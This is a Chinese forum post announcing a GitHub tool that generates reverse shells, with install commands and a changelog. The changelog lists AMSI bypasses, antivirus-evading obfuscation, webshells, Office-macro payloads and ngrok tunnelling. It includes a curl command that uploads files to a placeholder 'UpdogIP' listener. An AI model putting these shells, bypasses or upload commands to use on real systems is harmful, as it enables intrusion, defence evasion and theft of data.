本地生成反弹shell脚本-网络攻防学习社区-安全圈子-FancyPig's blog

本地生成反弹shell脚本

Sec-Labs徽章-备受瞩目-FancyPig's blog等级-LV8-FancyPig's blog31天前发布
10080

项目地址

https://github.com/4ndr34z/shells

Shell

一个快速简单地生成通用 revshell 的脚本。
当需要 PowerShell 和 Python revshells 时特别好,这可以是正确格式化的 PITA。

PowerShell 反弹shell

  • 在提示符和工作目录上方显示 username@computer
  • 有一个部分的 AMSI 旁路使一些东西更容易一些,比如加载一个完整的 AMSI 旁路。
  • TCP 和 UDP 外壳
  • Windows Powershell 和核心 Powershell
  • 上传和下载文件的功能。(使用sc0tfree的 Updog)

ngrok 支持

  • ngrok 可以从脚本内部启动/停止
  • 有效载荷将与 ngrok 地址一起生成

更新支持

  • 您可以从脚本内部启动/停止 Updog
  • PowerShell revshells 嵌入了上传/下载功能
  • 使用 curl 从 nix 上传: curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload

安装Shell

git clone https://github.com/4ndr34z/shells
cd shells
./install.sh

 

 

 

 

 

 

 

800cd4b481140714

613b002f14140531

0200fbd62c140532

a655226d89140531

30d6faa58d140532

8d7a86bc75140531

e0c0fc2244140531

Youtube 视频

关联

版本 1.5.0

  • PowerShell:为 MS Office 宏添加了 VBA 负载
  • 添加了一些 node.js 负载

版本 1.4.9

  • 添加了一个简单的 C# shell。
  • 添加了用于将 C# shell 反射加载到内存中的有效负载。(需要完整的 AMSI 旁路)
  • 通过添加 Rastamouse 的完整 AMSI Bypass 来解决这个问题
  • PowerShell:您可以自动上传并运行完整的 AMSI 旁路。部分 AMSI 旁路使这成为可能。
  • C# Shell:在将其加载到内存之前自动上传并运行完整的 AMSI 旁路
  • Updog 和 ngrok 状态显示在每个菜单中

版本 1.4.8

  • 有时少即是多。删除了 TCP/UDP PowerShell revshells 上的混淆,因为它实际上触发 AV 的次数多于它绕过的次数,并且有效负载变得非常大 🙂 仍在使用随机化。

版本 1.4.6

  • 添加了 webshel​​ls (ASPX, PHP, JSP)

版本 1.4.5

  • 为 Windows 32 位和 64 位添加了 2 个 c++ revshell 二进制文件。

版本 1.4.4

  • 修复了启动/停止 Updog 的处理

版本 1.4.3

  • 添加了 Updog 支持
  • 添加了 Netcat 二进制文件。
  • Powershell:创建了上传/下载功能(上传需要 Updog 来接收文件)
  • 添加了有关运行 ngrok 和 Updog 的更多信息。

版本 1.4.2

  • PowerShell:添加了一个新的“迷你 AMSI 旁路”。(是部分绕过)基于Matt Graebers Reflection方法
  • PowerShell:在 Powershell reverseshell 中添加了“上传”功能

版本 1.4.1

  • 删除了 AMSI。没有经过足够的测试:-)

版本 1.4

  • 为 powershell 有效载荷添加了 AMSI 旁路

版本 1.3.9

  • 修正了设置端口时的错误
  • 将默认端口更改为 443
  • PowerShell:混淆了一些

版本 1.3.8

  • PowerShell:对 UDP 负载的微小更改

版本 1.3.7

  • 在 macOS 上仅使用本机 nc,因为自制软件上的 nc 不适用于传入的 UDP
  • PowerShell:添加了 UDP 负载

版本 1.3.6

  • PowerShell:添加了更多有效负载

版本 1.3.5

  • PowerShell:为有效载荷添加了一些随机化和混淆

版本 1.3.4

  • PowerShell:在负载中使用 UTF8 编码

版本 1.3.3

  • 添加了 Go 语言

版本 1.3.2

  • 添加了 OpenSSL

版本 1.3.1

  • 修复了 Python revshell 中的错误
  • 添加了awk
  • 添加了 Bash UDP

版本 1.3

  • 添加了 Windows Python revshell

版本 1.2.9

  • 添加了 ngrok 运行状态

版本 1.2.8

  • 如果未安装则隐藏 ngrok 选择

版本 1.2.7

  • 修复了安装选项:在没有选择的情况下按回车键时不执行默认选项

版本 1.2.6

  • 添加了对 ngrok 的支持。

版本 1.2.4

  • 添加了安装脚本
  • 添加了用于检查和安装缺少的依赖项的安装选项

版本 1.2.3

  • 添加了几个 PHP shell

版本 1.2.2

  • 为 Ruby、Perl、Telnet 和 zsh 添加了 shell

版本 1.2.1

  • 在 macOS 上使用 pbcopy 添加了复制到剪贴板
  • 添加了关于监听 netcat 的信息,因为 macOS 版本不显示

版本 1.2

  • 添加了循环 netcat shell。每 10 秒回调一次。万一你松了壳
  • 添加了在 macOS 上运行时检查 netcat GNU netcat 0.7.0 Homebrew

版本 1.1

  • 添加了对 macOS 的支持

 

反弹shell工具分享
评分
欢迎为他评分
分享
请登录后发表评论

    没有回复内容

本文作者
用户封面
Sec-Labs的头像-FancyPig's blog
Adobe Acrobat Reader – CVE-2023-21608 – 远程代码执行漏洞
方糖全栈路线图2023,为「从螺丝钉到一人企业」补全技能栈
内网传输工具
从零开始学习Kubernetes的路线图(初级到高级)
通过基于 Windows ReleaseID 从远程服务器在内存中加载反射 Ntdll | 绕过EDR设备
一款API水平越权漏洞检测工具
分享
网络攻防学习-FancyPig's blog

网络攻防学习

分享网络攻防学习的全部资料
发布
帖子
1111
互动
2646
阅读
17.5W+
本版版主
随便看看

更多圈子

扫码添加微信-FancyPig's blog
在手机上浏览此页面
发布文章发布帖子